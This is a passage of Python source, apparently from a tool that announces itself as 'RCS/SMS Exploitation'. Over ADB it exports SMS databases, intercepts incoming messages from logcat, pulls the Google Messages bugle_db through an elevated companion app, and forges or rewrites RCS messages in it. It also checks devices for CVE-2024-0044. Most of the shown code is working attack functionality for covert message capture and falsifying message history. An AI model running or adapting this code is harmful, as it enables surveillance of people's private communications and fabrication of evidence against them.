Steps: 1) Run full_backup on source, 2) Connect target device, 3) Run full_restore with the backup file. """ backup = self.full_backup() if not backup.get('ok'): return backup return { 'ok': True, 'message': 'Backup created. Connect target device and call full_restore()', 'backup_path': backup['path'], 'stats': backup['stats'], } def export_messages(self, address: Optional[str] = None, fmt: str = 'json') -> Dict[str, Any]: """Export messages to JSON, CSV, or XML.""" if address: msgs = self.get_messages_by_address(address) else: msgs = self.read_sms_database(limit=10000) timestamp = datetime.now().strftime('%Y%m%d_%H%M%S') suffix = f'_{address}' if address else '_all' if fmt == 'csv': export_path = self._exports_dir / f'export{suffix}_{timestamp}.csv' with open(export_path, 'w', newline='') as f: if msgs: writer = csv.DictWriter(f, fieldnames=msgs[0].keys()) writer.writeheader() writer.writerows(msgs) elif fmt == 'xml': export_path = self._exports_dir / f'export{suffix}_{timestamp}.xml' self._write_sms_backup_xml(msgs, str(export_path)) else: export_path = self._exports_dir / f'export{suffix}_{timestamp}.json' with open(export_path, 'w') as f: json.dump(msgs, f, indent=2, default=str) return { 'ok': True, 'path': str(export_path), 'count': len(msgs), 'format': fmt, } def list_backups(self) -> Dict[str, Any]: """List all backup files.""" backups = [] for f in sorted(self._backups_dir.iterdir(), reverse=True): if f.is_file(): backups.append({ 'name': f.name, 'path': str(f), 'size': f.stat().st_size, 'modified': datetime.fromtimestamp(f.stat().st_mtime).isoformat(), }) return {'ok': True, 'backups': backups, 'count': len(backups)} def list_exports(self) -> Dict[str, Any]: """List all exported files.""" exports = [] for f in sorted(self._exports_dir.iterdir(), reverse=True): if f.is_file(): exports.append({ 'name': f.name, 'path': str(f), 'size': f.stat().st_size, 'modified': datetime.fromtimestamp(f.stat().st_mtime).isoformat(), }) return {'ok': True, 'exports': exports, 'count': len(exports)} def list_extracted_dbs(self) -> Dict[str, Any]: """List extracted database snapshots.""" extractions = [] for d in sorted(self._extracted_dir.iterdir(), reverse=True): if d.is_dir(): files = [f.name for f in d.iterdir()] total_size = sum(f.stat().st_size for f in d.iterdir() if f.is_file()) extractions.append({ 'name': d.name, 'path': str(d), 'files': files, 'total_size': total_size, }) return {'ok': True, 'extractions': extractions, 'count': len(extractions)} # ══════════════════════════════════════════════════════════════════════ # §11 SMS/RCS MONITOR # ══════════════════════════════════════════════════════════════════════ def start_sms_monitor(self) -> Dict[str, Any]: if self._monitor_running: return {'ok': False, 'error': 'Monitor already running'} self._monitor_running = True self._monitor_thread = threading.Thread( target=self._monitor_loop, daemon=True, name='rcs-monitor', ) self._monitor_thread.start() return {'ok': True, 'message': 'SMS/RCS monitor started'} def stop_sms_monitor(self) -> Dict[str, Any]: self._monitor_running = False return {'ok': True, 'message': 'Monitor stopping', 'intercepted': len(self._intercepted)} def get_intercepted_messages(self) -> Dict[str, Any]: with self._intercepted_lock: msgs = list(self._intercepted) return {'ok': True, 'messages': msgs, 'count': len(msgs)} def clear_intercepted(self) -> Dict[str, Any]: with self._intercepted_lock: count = len(self._intercepted) self._intercepted.clear() return {'ok': True, 'cleared': count} def _monitor_loop(self): """Background thread: watch logcat for incoming SMS/RCS.""" adb = self._get_adb() try: proc = subprocess.Popen( f'{adb} shell logcat -s Bugle:V SmsReceiverService:V ' f'SmsMessage:V RilReceiver:V', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True, ) while self._monitor_running: line = proc.stdout.readline() if not line: break line = line.strip() if not line: continue # Parse relevant log lines entry = None if 'SMS received' in line or 'received SMS' in line.lower(): entry = {'type': 'sms_received', 'raw': line, 'time': datetime.now().isoformat()} elif 'RCS' in line and ('received' in line.lower() or 'incoming' in line.lower()): entry = {'type': 'rcs_received', 'raw': line, 'time': datetime.now().isoformat()} elif 'SmsMessage' in line: entry = {'type': 'sms_activity', 'raw': line, 'time': datetime.now().isoformat()} if entry: with self._intercepted_lock: self._intercepted.append(entry) if len(self._intercepted) > 1000: self._intercepted = self._intercepted[-500:] proc.terminate() except Exception: pass finally: self._monitor_running = False def get_forged_log(self) -> List[Dict[str, Any]]: return list(self._forged_log) def clear_forged_log(self) -> Dict[str, Any]: count = len(self._forged_log) self._forged_log.clear() return {'ok': True, 'cleared': count} # ══════════════════════════════════════════════════════════════════════ # §12 ARCHON APP INTEGRATION # ══════════════════════════════════════════════════════════════════════ def archon_query(self, action: str, extras: Optional[Dict[str, str]] = None) -> Dict[str, Any]: """Send a command to Archon's MessagingModule via ADB broadcast.""" cmd = f'shell am broadcast -a com.darkhal.archon.{action}' if extras: for key, val in extras.items(): if isinstance(val, int): cmd += f' --ei {key} {val}' elif isinstance(val, bool): cmd += f' --ez {key} {str(val).lower()}' else: safe = str(val).replace('"', '\\"') cmd += f' --es {key} "{safe}"' cmd += ' com.darkhal.archon' result = self._run_adb(cmd) return { 'ok': 'Broadcast completed' in result, 'result': result, } def archon_extract_bugle(self) -> Dict[str, Any]: """Ask Archon to extract bugle_db via Shizuku elevated access.""" return self.archon_query('EXTRACT_DB', { 'target_package': 'com.google.android.apps.messaging', 'database': 'bugle_db', 'output_dir': '/sdcard/Download/autarch_extract', }) def archon_forge_rcs(self, address: str, body: str, direction: str = 'incoming') -> Dict[str, Any]: """Ask Archon to insert RCS message directly into bugle_db.""" return self.archon_query('FORGE_RCS', { 'address': address, 'body': body, 'direction': direction, 'timestamp': str(self._ts_ms()), }) def archon_modify_rcs(self, msg_id: int, new_body: str) -> Dict[str, Any]: """Ask Archon to modify an RCS message in bugle_db.""" return self.archon_query('MODIFY_RCS', { 'msg_id': msg_id, 'new_body': new_body, }) def archon_get_rcs_threads(self) -> Dict[str, Any]: """Get RCS thread list via Archon relay.""" return self.archon_query('GET_RCS_THREADS') def archon_backup_all(self) -> Dict[str, Any]: """Full backup via Archon (SMS + MMS + RCS + attachments).""" result = self.archon_query('FULL_BACKUP', { 'output_dir': '/sdcard/Download/autarch_backup', 'include_rcs': 'true', 'include_attachments': 'true', }) if result.get('ok'): # Pull the backup time.sleep(5) timestamp = datetime.now().strftime('%Y%m%d_%H%M%S') local_dir = self._backups_dir / f'archon_backup_{timestamp}' local_dir.mkdir(parents=True, exist_ok=True) pull = self._run_adb(f'pull /sdcard/Download/autarch_backup/ {local_dir}/') result['local_path'] = str(local_dir) result['pull_result'] = pull return result def archon_set_default_sms(self) -> Dict[str, Any]: """Set Archon as the default SMS/RCS app (enables full message access).""" return self.set_default_sms_app('com.darkhal.archon') # ══════════════════════════════════════════════════════════════════════ # §13 PIXEL-SPECIFIC TOOLS # ══════════════════════════════════════════════════════════════════════ def pixel_diagnostics(self) -> Dict[str, Any]: """Run Pixel-specific RCS diagnostic commands.""" results = {} # IMS status results['ims'] = self._shell('dumpsys telephony_ims')[:3000] # Carrier config (extract RCS-relevant keys) cc = self.get_carrier_config() results['carrier_rcs_config'] = cc.get('rcs_config', {}) # Phone info results['phone'] = self._shell('dumpsys phone | head -50') # Check if Pixel brand = self._shell('getprop ro.product.brand').lower() results['is_pixel'] = 'google' in brand # RCS-specific settings results['rcs_settings'] = {} for key in ['rcs_autoconfiguration_enabled', 'rcs_e2ee_enabled', 'chat_features_enabled']: val = self._shell(f'settings get global {key}') if not self._is_error(val): results['rcs_settings'][key] = val return {'ok': True, **results} def enable_debug_menu(self) -> Dict[str, Any]: """Instructions and automation for enabling Google Messages debug menu.""" return { 'ok': True, 'instructions': [ '1. Open Google Messages on the device', '2. Tap the search bar', '3. Type: *xyzzy*', '4. A debug menu will appear in Settings', '5. Enables: RCS connection state, ACS URL, feature flags, verbose logging', ], 'automated_phenotype': 'Use enable_verbose_logging() to enable debug flags via Phenotype', } # ══════════════════════════════════════════════════════════════════════ # §14 CLI ENTRY POINT # ══════════════════════════════════════════════════════════════════════ def run(self): """CLI interactive mode.""" print(f"\n RCS/SMS Exploitation v{VERSION}") print(" " + "=" * 40) status = self.get_status() if status.get('connected'): dev = status['device'] print(f" Device: {dev.get('model', '?')} ({dev.get('serial', '?')})") print(f" Android: {dev.get('android_version', '?')} (patch: {dev.get('security_patch', '?')})") print(f" SMS App: {dev.get('default_sms_app', '?')}") shizuku = status.get('shizuku', {}) print(f" Shizuku: {'running' if shizuku.get('running') else 'not running'}") archon = status.get('archon', {}) print(f" Archon: {'installed' if archon.get('installed') else 'not installed'}") cve = status.get('cve_2024_0044', {}) if cve.get('vulnerable'): print(f" CVE-2024-0044: VULNERABLE") else: print(" No device connected") def run(): get_rcs_tools().run()